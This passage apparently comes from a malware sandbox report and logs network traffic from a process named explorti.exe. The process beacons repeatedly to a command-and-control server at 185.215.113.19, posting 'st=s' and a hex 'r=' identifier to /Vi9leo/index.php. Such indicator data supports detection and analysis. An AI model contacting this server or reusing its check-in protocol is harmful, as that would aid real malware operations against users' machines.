                  Jul 27, 2024 04:50:52.923271894 CEST8049778185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:52.923393965 CEST4977880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:52.927042007 CEST4977880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:52.931999922 CEST8049778185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:53.174309015 CEST8049778185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:53.174422026 CEST4977880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:53.278912067 CEST4977880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:53.279314995 CEST4977980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:53.284276009 CEST8049779185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:53.284339905 CEST8049778185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:53.284435987 CEST4977980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:53.284523964 CEST4977880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:53.284689903 CEST4977980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:53.289551973 CEST8049779185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:54.031687021 CEST8049779185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:54.031793118 CEST4977980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:54.032618999 CEST4977980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:54.037466049 CEST8049779185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:54.279365063 CEST8049779185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:54.279454947 CEST4977980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:54.388753891 CEST4977980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:54.389170885 CEST4978080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:54.394314051 CEST8049779185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:54.394354105 CEST8049780185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:54.394414902 CEST4977980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:54.394467115 CEST4978080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:54.394608974 CEST4978080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:54.399478912 CEST8049780185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:55.173336983 CEST8049780185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:55.173474073 CEST4978080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:55.174128056 CEST4978080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:55.180535078 CEST8049780185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:55.422528028 CEST8049780185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:55.422620058 CEST4978080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:55.529059887 CEST4978080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:55.529356956 CEST4978180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:55.536075115 CEST8049781185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:55.536154985 CEST4978180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:55.536279917 CEST4978180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:55.536684036 CEST8049780185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:55.536751986 CEST4978080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:55.544580936 CEST8049781185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:56.316363096 CEST8049781185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:56.316556931 CEST4978180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:56.318182945 CEST4978180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:56.323144913 CEST8049781185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:56.564385891 CEST8049781185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:56.564460039 CEST4978180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:56.669787884 CEST4978180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:56.670280933 CEST4978280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:56.675282001 CEST8049782185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:56.675345898 CEST8049781185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:56.675558090 CEST4978180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:56.675559044 CEST4978280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:56.675740957 CEST4978280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:56.680608034 CEST8049782185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:57.412817955 CEST8049782185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:57.412889004 CEST4978280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:57.413593054 CEST4978280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:57.419080019 CEST8049782185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:57.658926010 CEST8049782185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:57.659023046 CEST4978280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:57.779285908 CEST4978280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:57.779813051 CEST4978380192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:57.784862041 CEST8049782185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:57.784953117 CEST8049783185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:57.784971952 CEST4978280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:57.785027027 CEST4978380192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:57.785224915 CEST4978380192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:57.790047884 CEST8049783185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:58.550549984 CEST8049783185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:58.550625086 CEST4978380192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:58.551523924 CEST4978380192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:58.556845903 CEST8049783185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:58.833211899 CEST8049783185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:58.839039087 CEST4978380192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:58.950781107 CEST4978380192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:58.951184034 CEST4978480192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:58.956171989 CEST8049784185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:58.956259966 CEST4978480192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:58.956331015 CEST8049783185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:58.956362963 CEST4978480192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:58.956501007 CEST4978380192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:58.961234093 CEST8049784185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:59.702533960 CEST8049784185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:59.702749968 CEST4978480192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:59.703680038 CEST4978480192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:59.708884954 CEST8049784185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:59.963933945 CEST8049784185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:59.964179993 CEST4978480192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:00.076689005 CEST4978480192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:00.080338001 CEST4978580192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:00.082561016 CEST8049784185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:00.082772017 CEST4978480192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:00.085200071 CEST8049785185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:00.085330963 CEST4978580192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:00.087898970 CEST4978580192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:00.093143940 CEST8049785185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:00.823472977 CEST8049785185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:00.823673964 CEST4978580192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:00.824618101 CEST4978580192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:00.830851078 CEST8049785185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:01.113168955 CEST8049785185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:01.113497972 CEST4978580192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:01.216706038 CEST4978580192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:01.216795921 CEST4978680192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:01.222532034 CEST8049786185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:01.222577095 CEST8049785185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:01.222661018 CEST4978680192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:01.222661018 CEST4978580192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:01.222973108 CEST4978680192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:01.227941990 CEST8049786185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:01.997522116 CEST8049786185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:01.997594118 CEST4978680192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:02.000643969 CEST4978680192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:02.006014109 CEST8049786185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:02.255573034 CEST8049786185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:02.259546995 CEST4978680192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:02.373801947 CEST4978680192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:02.374279022 CEST4978780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:02.379821062 CEST8049786185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:02.379865885 CEST8049787185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:02.379925013 CEST4978680192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:02.379966021 CEST4978780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:02.380160093 CEST4978780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:02.385080099 CEST8049787185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:03.239882946 CEST8049787185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:03.240273952 CEST4978780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:03.286530018 CEST4978780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:03.291939974 CEST8049787185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:03.552603960 CEST8049787185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:03.552927017 CEST4978780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:03.706657887 CEST4978780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:03.709820986 CEST4978880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:03.712609053 CEST8049787185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:03.712728977 CEST4978780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:03.714961052 CEST8049788185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:03.715020895 CEST4978880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:03.718384027 CEST4978880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:03.723423004 CEST8049788185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:04.490556002 CEST8049788185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:04.490757942 CEST4978880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:04.493735075 CEST4978880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:04.494215012 CEST4978980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:04.499422073 CEST8049789185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:04.499460936 CEST8049788185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:04.499537945 CEST4978880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:04.499562979 CEST4978980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:04.499986887 CEST4978980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:51:04.505219936 CEST8049789185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:05.249130964 CEST8049789185.215.113.19192.168.2.4
                  Jul 27, 2024 04:51:05.249217987 CEST4978980192.168.2.4185.215.113.19
                  • 185.215.113.19
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.449737185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:03.424983025 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:04.435867071 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:04.437208891 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:04.438379049 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:04.690713882 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.449738185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:04.800107956 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:05.535300016 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:05.536300898 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:05.780839920 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.449739185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:05.911653042 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:06.678591013 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:06.679553032 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:07.275886059 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.449740185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:07.394228935 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:08.162256956 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:08.163115978 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:09.382258892 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0
                  Jul 27, 2024 04:50:09.382395983 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0
                  Jul 27, 2024 04:50:09.382431030 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.449741185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:09.503314972 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:10.278546095 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:10.279540062 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:10.531975985 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.449742185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:10.678642035 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:11.412758112 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:11.413577080 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:11.660523891 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.449743185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:11.769718885 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:12.537734032 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
